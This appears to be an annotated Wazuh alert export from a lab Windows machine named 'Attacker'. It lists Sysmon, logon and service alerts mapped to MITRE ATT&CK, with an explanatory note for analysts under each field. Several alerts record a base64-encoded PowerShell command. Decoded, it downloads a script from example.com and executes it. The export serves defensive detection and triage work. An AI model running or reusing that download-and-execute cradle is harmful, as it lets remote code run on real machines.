data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.721+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.721+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.942369
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:44.8784134Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282170
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:44.876 ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} ProcessId: 11892 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yefpwlal.rop.ps1 CreationUtcTime: 2025-04-24 22:35:44.876 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:44.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbf-680a-a90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yefpwlal.rop.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:44.876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.085+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.085+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.945137
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:45.9124642Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282194
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:45.401 ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} ProcessId: 8908 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} ParentProcessId: 11892 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:45.401
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc1-680a-ac0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcbf-680a-a90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.103+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.103+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.953203
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:46.0795400Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282195
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:46.051 ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} ProcessId: 8908 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_toe2blgg.cdx.ps1 CreationUtcTime: 2025-04-24 22:35:46.051 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:46.051
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc1-680a-ac0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_toe2blgg.cdx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:46.051
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:54.457+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.457+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  51
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.955967
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:47.1449849Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43824
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:54.471+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.471+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

